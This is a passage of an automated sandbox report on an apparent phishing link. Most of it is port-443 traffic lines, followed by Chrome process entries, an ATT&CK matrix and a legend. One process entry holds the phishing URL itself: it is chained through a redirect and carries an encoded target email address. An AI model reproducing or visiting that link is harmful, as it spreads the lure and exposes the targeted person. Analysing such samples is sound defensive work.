    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50330
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50333
    Source: unknownNetwork traffic detected: HTTP traffic on port 50632 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50332
    Source: unknownNetwork traffic detected: HTTP traffic on port 50873 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50335
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50334
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50999 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50348
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50347
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50349
    Source: unknownNetwork traffic detected: HTTP traffic on port 50505 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50935 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50340
    Source: unknownNetwork traffic detected: HTTP traffic on port 50987 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50344
    Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51001 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50346
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50345
    Source: unknownNetwork traffic detected: HTTP traffic on port 50673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50885 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50359
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50358
    Source: unknownNetwork traffic detected: HTTP traffic on port 50804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50351
    Source: unknownNetwork traffic detected: HTTP traffic on port 50558 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50350
    Source: unknownNetwork traffic detected: HTTP traffic on port 50317 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50353
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50352
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50355
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50354
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50356
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50861 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50360
    Source: unknownNetwork traffic detected: HTTP traffic on port 50620 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50419 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50369
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50361
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50364
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50366
    Source: unknownNetwork traffic detected: HTTP traffic on port 50897 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50368
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50367
    Source: unknownNetwork traffic detected: HTTP traffic on port 50923 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50371
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50370
    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50779
    Source: unknownNetwork traffic detected: HTTP traffic on port 50911 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50778
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50770
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50772
    Source: unknownNetwork traffic detected: HTTP traffic on port 51025 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50775
    Source: unknownNetwork traffic detected: HTTP traffic on port 50350 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50943 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50697 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50607 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50444 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50303
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50787
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50306
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50789
    Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50308
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50307
    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50780
    Source: unknownNetwork traffic detected: HTTP traffic on port 50702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50784
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50302
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50301
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50785
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50799
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50314
    Source: unknownNetwork traffic detected: HTTP traffic on port 50791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50317
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50316
    Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50792
    Source: unknownNetwork traffic detected: HTTP traffic on port 50394 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50311
    Source: unknownNetwork traffic detected: HTTP traffic on port 50619 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50795
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50310
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50313
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50312
    Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50349 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51013 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50326
    Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50329
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50320
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50322
    Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50321
    Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50324
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50323
    Source: unknownNetwork traffic detected: HTTP traffic on port 50746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50432 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50514 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50296
    Source: unknownNetwork traffic detected: HTTP traffic on port 50915 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50295
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50299
    Source: unknownNetwork traffic detected: HTTP traffic on port 50400 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50389 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50377 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50652 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50537 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50502 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50550 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50390 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50903 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50549 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50481 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50940 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50665 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50640 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
    Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
    Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
    Source: unknownNetwork traffic detected: HTTP traffic on port 50353 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
    Source: unknownNetwork traffic detected: HTTP traffic on port 50456 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51048 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50574 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
    Source: unknownNetwork traffic detected: HTTP traffic on port 50952 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
    Source: unknownNetwork traffic detected: HTTP traffic on port 50639 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50264
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50268
    Source: unknownNetwork traffic detected: HTTP traffic on port 50264 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50270
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50272
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50271
    Source: unknownNetwork traffic detected: HTTP traffic on port 50677 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50881 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51016 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50274
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50276
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50278
    Source: unknownNetwork traffic detected: HTTP traffic on port 51004 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50279
    Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50283
    Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50276 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50285
    Source: unknownNetwork traffic detected: HTTP traffic on port 50964 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50284
    Source: unknownNetwork traffic detected: HTTP traffic on port 50689 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50287
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50286
    Source: unknownNetwork traffic detected: HTTP traffic on port 50893 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50292
    Source: unknownNetwork traffic detected: HTTP traffic on port 50799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50627 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50690 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51041 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50517 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50947 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50448 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50461 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50959 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50529 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50615 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50586 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51053 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50345 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50660 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50530 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50960 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51028 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50659 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50296 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50404 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50542 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50972 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50509 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50321 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50939 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50868 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50493 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50984 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50554 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50284 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50333 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50669 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50927 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50854
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50853
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50856
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50855
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50858
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50857
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50859
    Source: unknownNetwork traffic detected: HTTP traffic on port 50749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50850
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50851
    Source: unknownNetwork traffic detected: HTTP traffic on port 51044 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 51032 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50865
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50864
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50867
    Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49743 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49746 version: TLS 1.2
    Source: classification engineClassification label: mal56.phis.win@26/1351@203/72
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2028,i,7290064601544366659,9652853675745150705,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://aeromexico.playable.video/xid_v:6533431697866752.uid_220877362/click/https://foxloc.com.br/g63a/Gcgaming/423184/#?email=YmthbXBodWlzQGdjZ2FtaW5nLmNvbQ=="
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2028,i,7290064601544366659,9652853675745150705,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Binary string: c.pdb_observe(g)}function d(){c&&g&&(c.pdb_unobserve(g),g=null)}var e=k,c=null,g=null,n=m.init(l);this.setAsin=function(e,l){l=l||{};d();c=f.get(e);a(c,l);c.loading&&b(function(b){a(b,l)});return c};this.clear=function(){d();c={};m.update(n,c)}}});g.P&&n.when("jQuery","afterLoad").register("gw-resource-logger",function(f){return{instrumentResources:function(m){var k;k=!1;if(f.isArray(m)&&!f.isEmptyObject(m)){k=!0;for(var h=0;h<m.length;h++){var l=m[h];if("id"in l&&"regex"in l&&"initiator"in l){if(!("string"=== source: chromecache_710.2.dr, chromecache_416.2.dr
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
    Process Injection
    1
    Process Injection
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
    Web Protocols
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging3
    Ingress Tool Transfer
    Scheduled TransferData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
